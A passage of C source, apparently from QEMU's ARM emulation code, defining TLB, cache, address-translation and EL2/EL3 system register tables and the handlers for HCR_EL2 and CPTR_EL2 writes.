= ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1_write }, { .name = "TLBI_VAE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 1, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_ASIDE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 2, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vmalle1_write }, { .name = "TLBI_VAAE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 3, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_VALE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 5, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_VAALE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 7, .access = PL1_W, .accessfn = access_ttlb, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_vae1_write }, { .name = "TLBI_IPAS2E1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 1, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1is_write }, { .name = "TLBI_IPAS2LE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 5, .access = 
PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1is_write }, { .name = "TLBI_ALLE1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 4, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1is_write }, { .name = "TLBI_VMALLS12E1IS", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 6, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1is_write }, { .name = "TLBI_IPAS2E1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 1, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1_write }, { .name = "TLBI_IPAS2LE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_ipas2e1_write }, { .name = "TLBI_ALLE1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 4, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1_write }, { .name = "TLBI_VMALLS12E1", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 6, .access = PL2_W, .type = ARM_CP_NO_RAW, .writefn = tlbi_aa64_alle1is_write }, /* 64 bit address translation operations */ { .name = "AT_S1E1R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 0, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E1W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 1, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E0R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 2, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E0W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 0, .crn = 7, .crm = 8, .opc2 = 3, .access = PL1_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S12E1R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 4, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S12E1W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 5, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S12E0R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 6, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S12E0W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 4, .crn = 7, .crm = 8, .opc2 = 7, .access = PL2_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, /* AT S1E2* are elsewhere as they UNDEF from EL3 if EL2 is not present */ { .name = "AT_S1E3R", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 7, .crm = 8, .opc2 = 0, .access = PL3_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "AT_S1E3W", .state = ARM_CP_STATE_AA64, .opc0 = 1, .opc1 = 6, .crn = 7, .crm = 8, .opc2 = 1, .access = PL3_W, .type = ARM_CP_NO_RAW | ARM_CP_RAISES_EXC, .writefn = ats_write64 }, { .name = "PAR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 0, .crn = 7, .crm = 4, .opc2 = 0, .access = PL1_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.par_el[1]), .writefn = par_write }, /* TLB invalidate last level of translation table walk */ { .name = "TLBIMVALIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 
3, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_is_write }, { .name = "TLBIMVAALIS", .cp = 15, .opc1 = 0, .crn = 8, .crm = 3, .opc2 = 7, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_is_write }, { .name = "TLBIMVAL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimva_write }, { .name = "TLBIMVAAL", .cp = 15, .opc1 = 0, .crn = 8, .crm = 7, .opc2 = 7, .type = ARM_CP_NO_RAW, .access = PL1_W, .accessfn = access_ttlb, .writefn = tlbimvaa_write }, { .name = "TLBIMVALH", .cp = 15, .opc1 = 4, .crn = 8, .crm = 7, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_write }, { .name = "TLBIMVALHIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 3, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbimva_hyp_is_write }, { .name = "TLBIIPAS2", .cp = 15, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_write }, { .name = "TLBIIPAS2IS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 1, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_is_write }, { .name = "TLBIIPAS2L", .cp = 15, .opc1 = 4, .crn = 8, .crm = 4, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_write }, { .name = "TLBIIPAS2LIS", .cp = 15, .opc1 = 4, .crn = 8, .crm = 0, .opc2 = 5, .type = ARM_CP_NO_RAW, .access = PL2_W, .writefn = tlbiipas2_is_write }, /* 32 bit cache operations */ { .name = "ICIALLUIS", .cp = 15, .opc1 = 0, .crn = 7, .crm = 1, .opc2 = 0, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "BPIALLUIS", .cp = 15, .opc1 = 0, .crn = 7, .crm = 1, .opc2 = 6, .type = ARM_CP_NOP, .access = PL1_W }, { .name = "ICIALLU", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 0, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "ICIMVAU", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "BPIALL", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 6, .type = ARM_CP_NOP, .access = PL1_W }, { .name = "BPIMVA", .cp = 15, .opc1 = 0, .crn = 7, .crm = 5, .opc2 = 7, .type = ARM_CP_NOP, .access = PL1_W }, { .name = "DCIMVAC", .cp = 15, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_poc_access }, { .name = "DCISW", .cp = 15, .opc1 = 0, .crn = 7, .crm = 6, .opc2 = 2, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = access_tsw }, { .name = "DCCMVAC", .cp = 15, .opc1 = 0, .crn = 7, .crm = 10, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_poc_access }, { .name = "DCCSW", .cp = 15, .opc1 = 0, .crn = 7, .crm = 10, .opc2 = 2, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = access_tsw }, { .name = "DCCMVAU", .cp = 15, .opc1 = 0, .crn = 7, .crm = 11, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_pou_access }, { .name = "DCCIMVAC", .cp = 15, .opc1 = 0, .crn = 7, .crm = 14, .opc2 = 1, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = aa64_cacheop_poc_access }, { .name = "DCCISW", .cp = 15, .opc1 = 0, .crn = 7, .crm = 14, .opc2 = 2, .type = ARM_CP_NOP, .access = PL1_W, .accessfn = access_tsw }, /* MMU Domain access control / MPU write buffer control */ { .name = "DACR", .cp = 15, .opc1 = 0, .crn = 3, .crm = 0, .opc2 = 0, .access = PL1_RW, .accessfn = access_tvm_trvm, .resetvalue = 0, .writefn = dacr_write, 
.raw_writefn = raw_write, .bank_fieldoffsets = { offsetoflow32(CPUARMState, cp15.dacr_s), offsetoflow32(CPUARMState, cp15.dacr_ns) } }, { .name = "ELR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 0, .opc2 = 1, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, elr_el[1]) }, { .name = "SPSR_EL1", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 0, .opc2 = 0, .access = PL1_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_SVC]) }, /* We rely on the access checks not allowing the guest to write to the * state field when SPSel indicates that it's being used as the stack * pointer. */ { .name = "SP_EL0", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 1, .opc2 = 0, .access = PL1_RW, .accessfn = sp_el0_access, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, sp_el[0]) }, { .name = "SP_EL1", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, sp_el[1]) }, { .name = "SPSel", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 0, .crn = 4, .crm = 2, .opc2 = 0, .type = ARM_CP_NO_RAW, .access = PL1_RW, .readfn = spsel_read, .writefn = spsel_write }, { .name = "FPEXC32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 3, .opc2 = 0, .type = ARM_CP_ALIAS, .fieldoffset = offsetof(CPUARMState, vfp.xregs[ARM_VFP_FPEXC]), .access = PL2_RW, .accessfn = fpexc32_access }, { .name = "DACR32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 3, .crm = 0, .opc2 = 0, .access = PL2_RW, .resetvalue = 0, .writefn = dacr_write, .raw_writefn = raw_write, .fieldoffset = offsetof(CPUARMState, cp15.dacr32_el2) }, { .name = "IFSR32_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 0, .opc2 = 1, .access = PL2_RW, .resetvalue = 0, .fieldoffset = offsetof(CPUARMState, cp15.ifsr32_el2) }, { .name = "SPSR_IRQ", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_IRQ]) }, { .name = "SPSR_ABT", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 1, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_ABT]) }, { .name = "SPSR_UND", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 2, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_UND]) }, { .name = "SPSR_FIQ", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 3, .opc2 = 3, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, banked_spsr[BANK_FIQ]) }, { .name = "MDCR_EL3", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 6, .crn = 1, .crm = 3, .opc2 = 1, .resetvalue = 0, .access = PL3_RW, .fieldoffset = offsetof(CPUARMState, cp15.mdcr_el3) }, { .name = "SDCR", .type = ARM_CP_ALIAS, .cp = 15, .opc1 = 0, .crn = 1, .crm = 3, .opc2 = 1, .access = PL1_RW, .accessfn = access_trap_aa32s_el1, .writefn = sdcr_write, .fieldoffset = offsetoflow32(CPUARMState, cp15.mdcr_el3) }, REGINFO_SENTINEL }; /* Used to describe the behaviour of EL2 regs when EL2 does not exist. 
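 * The stubs below make those encodings RAZ/WI rather than UNDEF, so
 * that, for example, EL3 software probing for EL2 state simply reads
 * zero:
 *
 *     mrs x0, sctlr_el2    // returns 0 instead of trapping
 *
 * Most entries are ARM_CP_CONST with resetvalue 0; VBAR_EL2 instead
 * uses the explicit arm_cp_read_zero/arm_cp_write_ignore callbacks.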
*/ static const ARMCPRegInfo el3_no_el2_cp_reginfo[] = { { .name = "VBAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 12, .crm = 0, .opc2 = 0, .access = PL2_RW, .readfn = arm_cp_read_zero, .writefn = arm_cp_write_ignore }, { .name = "HCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HACR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 7, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "ESR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CPTR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "MAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HMAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 2, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AMAIR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HAMAIR1", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 10, .crm = 3, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR0_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "AFSR1_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 5, .crm = 1, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "VTCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 2, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "VTTBR", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 6, .crm = 2, .access = PL2_RW, .accessfn = access_el3_aa32ns, .type = ARM_CP_CONST | ARM_CP_64BIT, .resetvalue = 0 }, { .name = "VTTBR_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "SCTLR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 0, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TPIDR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 13, .crm = 0, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "TTBR0_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 2, .crm = 0, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HTTBR", .cp = 15, .opc1 = 4, .crm = 2, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHCTL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 1, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTVOFF_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 0, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name =
"CNTVOFF", .cp = 15, .opc1 = 4, .crm = 14, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_CVAL_EL2", .state = ARM_CP_STATE_AA64, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 2, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_CVAL", .cp = 15, .opc1 = 6, .crm = 14, .access = PL2_RW, .type = ARM_CP_64BIT | ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_TVAL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "CNTHP_CTL_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 14, .crm = 2, .opc2 = 1, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "MDCR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 1, .access = PL2_RW, .accessfn = access_tda, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HPFAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 4, .access = PL2_RW, .accessfn = access_el3_aa32ns_aa64any, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HSTR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 3, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "FAR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 0, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "HIFAR", .state = ARM_CP_STATE_AA32, .type = ARM_CP_CONST, .cp = 15, .opc1 = 4, .crn = 6, .crm = 0, .opc2 = 2, .access = PL2_RW, .resetvalue = 0 }, REGINFO_SENTINEL }; /* Ditto, but for registers which exist in ARMv8 but not v7 */ static const ARMCPRegInfo el3_no_el2_v8_cp_reginfo[] = { { .name = "HCR2", .state = ARM_CP_STATE_AA32, .cp = 15, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 4, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, REGINFO_SENTINEL }; static void do_hcr_write(CPUARMState *env, uint64_t value, uint64_t valid_mask) { ARMCPU *cpu = env_archcpu(env); if (arm_feature(env, ARM_FEATURE_V8)) { valid_mask |= MAKE_64BIT_MASK(0, 34); /* ARMv8.0 */ } else { valid_mask |= MAKE_64BIT_MASK(0, 28); /* ARMv7VE */ } if (arm_feature(env, ARM_FEATURE_EL3)) { valid_mask &= ~HCR_HCD; } else if (cpu->psci_conduit != QEMU_PSCI_CONDUIT_SMC) { /* Architecturally HCR.TSC is RES0 if EL3 is not implemented. * However, if we're using the SMC PSCI conduit then QEMU is * effectively acting like EL3 firmware and so the guest at * EL2 should retain the ability to prevent EL1 from being * able to make SMC calls into the ersatz firmware, so in * that case HCR.TSC should be read/write. */ valid_mask &= ~HCR_TSC; } if (arm_feature(env, ARM_FEATURE_AARCH64)) { if (cpu_isar_feature(aa64_vh, cpu)) { valid_mask |= HCR_E2H; } if (cpu_isar_feature(aa64_lor, cpu)) { valid_mask |= HCR_TLOR; } if (cpu_isar_feature(aa64_pauth, cpu)) { valid_mask |= HCR_API | HCR_APK; } } /* Clear RES0 bits. */ value &= valid_mask; /* These bits change the MMU setup: * HCR_VM enables stage 2 translation * HCR_PTW forbids certain page-table setups * HCR_DC Disables stage1 and enables stage2 translation */ if ((env->cp15.hcr_el2 ^ value) & (HCR_VM | HCR_PTW | HCR_DC)) { tlb_flush(CPU(cpu)); } env->cp15.hcr_el2 = value; /* * Updates to VI and VF require us to update the status of * virtual interrupts, which are the logical OR of these bits * and the state of the input lines from the GIC. 
(This requires * that we have the iothread lock, which is done by marking the * reginfo structs as ARM_CP_IO.) * Note that if a write to HCR pends a VIRQ or VFIQ it is never * possible for it to be taken immediately, because VIRQ and * VFIQ are masked unless running at EL0 or EL1, and HCR * can only be written at EL2. */ arm_cpu_update_virq(cpu); arm_cpu_update_vfiq(cpu); } static void hcr_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { do_hcr_write(env, value, 0); } static void hcr_writehigh(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Handle HCR2 write, i.e. write to high half of HCR_EL2 */ value = deposit64(env->cp15.hcr_el2, 32, 32, value); do_hcr_write(env, value, MAKE_64BIT_MASK(0, 32)); } static void hcr_writelow(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* Handle HCR write, i.e. write to low half of HCR_EL2 */ value = deposit64(env->cp15.hcr_el2, 0, 32, value); do_hcr_write(env, value, MAKE_64BIT_MASK(32, 32)); } /* * Return the effective value of HCR_EL2. * Bits that are not included here: * RW (read from SCR_EL3.RW as needed) */ uint64_t arm_hcr_el2_eff(CPUARMState *env) { uint64_t ret = env->cp15.hcr_el2; if (arm_is_secure_below_el3(env)) { /* * "This register has no effect if EL2 is not enabled in the * current Security state". This is ARMv8.4-SecEL2 speak for * !(SCR_EL3.NS==1 || SCR_EL3.EEL2==1). * * Prior to that, the language was "In an implementation that * includes EL3, when the value of SCR_EL3.NS is 0 the PE behaves * as if this field is 0 for all purposes other than a direct * read or write access of HCR_EL2". With lots of enumeration * on a per-field basis. In current QEMU, this condition * is arm_is_secure_below_el3. * * Since the v8.4 language applies to the entire register, and * appears to be backward compatible, use that. */ return 0; } /* * For a cpu that supports both aarch64 and aarch32, we can set bits * in HCR_EL2 (e.g. via EL3) that are RES0 when we enter EL2 as aa32. * Ignore all of the bits in HCR+HCR2 that are not valid for aarch32. */ if (!arm_el_is_aa64(env, 2)) { uint64_t aa32_valid; /* * These bits are up-to-date as of ARMv8.6. * For HCR, it's easiest to list just the 2 bits that are invalid. * For HCR2, list those that are valid. */ aa32_valid = MAKE_64BIT_MASK(0, 32) & ~(HCR_RW | HCR_TDZ); aa32_valid |= (HCR_CD | HCR_ID | HCR_TERR | HCR_TEA | HCR_MIOCNCE | HCR_TID4 | HCR_TICAB | HCR_TOCU | HCR_TTLBIS); ret &= aa32_valid; } if (ret & HCR_TGE) { /* These bits are up-to-date as of ARMv8.6. */ if (ret & HCR_E2H) { ret &= ~(HCR_VM | HCR_FMO | HCR_IMO | HCR_AMO | HCR_BSU_MASK | HCR_DC | HCR_TWI | HCR_TWE | HCR_TID0 | HCR_TID2 | HCR_TPCP | HCR_TPU | HCR_TDZ | HCR_CD | HCR_ID | HCR_MIOCNCE | HCR_TID4 | HCR_TICAB | HCR_TOCU | HCR_ENSCXT | HCR_TTLBIS | HCR_TTLBOS | HCR_TID5); } else { ret |= HCR_FMO | HCR_IMO | HCR_AMO; } ret &= ~(HCR_SWIO | HCR_PTW | HCR_VF | HCR_VI | HCR_VSE | HCR_FB | HCR_TID1 | HCR_TID3 | HCR_TSC | HCR_TACR | HCR_TSW | HCR_TTLB | HCR_TVM | HCR_HCD | HCR_TRVM | HCR_TLOR); } return ret; } static void cptr_el2_write(CPUARMState *env, const ARMCPRegInfo *ri, uint64_t value) { /* * For A-profile AArch32 EL3, if NSACR.CP10 * is 0 then HCPTR.{TCP11,TCP10} ignore writes and read as 1.
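     *
     * A minimal worked example, assuming AArch32 EL3, non-secure state
     * and NSACR.CP10 == 0: writing 0 to HCPTR leaves bits [11:10] at
     * their previous value,
     *
     *     value &= ~(0x3 << 10);                        // drop written bits
     *     value |= env->cp15.cptr_el[2] & (0x3 << 10);  // keep TCP11/TCP10
     *
     * while cptr_el2_read() below forces those two bits to read as 1.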
*/ if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value &= ~(0x3 << 10); value |= env->cp15.cptr_el[2] & (0x3 << 10); } env->cp15.cptr_el[2] = value; } static uint64_t cptr_el2_read(CPUARMState *env, const ARMCPRegInfo *ri) { /* * For A-profile AArch32 EL3, if NSACR.CP10 * is 0 then HCPTR.{TCP11,TCP10} ignore writes and read as 1. */ uint64_t value = env->cp15.cptr_el[2]; if (arm_feature(env, ARM_FEATURE_EL3) && !arm_el_is_aa64(env, 3) && !arm_is_secure(env) && !extract32(env->cp15.nsacr, 10, 1)) { value |= 0x3 << 10; } return value; } static const ARMCPRegInfo el2_cp_reginfo[] = { { .name = "HCR_EL2", .state = ARM_CP_STATE_AA64, .type = ARM_CP_IO, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hcr_el2), .writefn = hcr_write }, { .name = "HCR", .state = ARM_CP_STATE_AA32, .type = ARM_CP_ALIAS | ARM_CP_IO, .cp = 15, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 0, .access = PL2_RW, .fieldoffset = offsetof(CPUARMState, cp15.hcr_el2), .writefn = hcr_writelow }, { .name = "HACR_EL2", .state = ARM_CP_STATE_BOTH, .opc0 = 3, .opc1 = 4, .crn = 1, .crm = 1, .opc2 = 7, .access = PL2_RW, .type = ARM_CP_CONST, .resetvalue = 0 }, { .name = "ELR_EL2", .state = ARM_CP_STATE_AA64, .type = ARM_CP_ALIAS, .opc0 = 3, .opc1 = 4, .crn = 4, .crm = 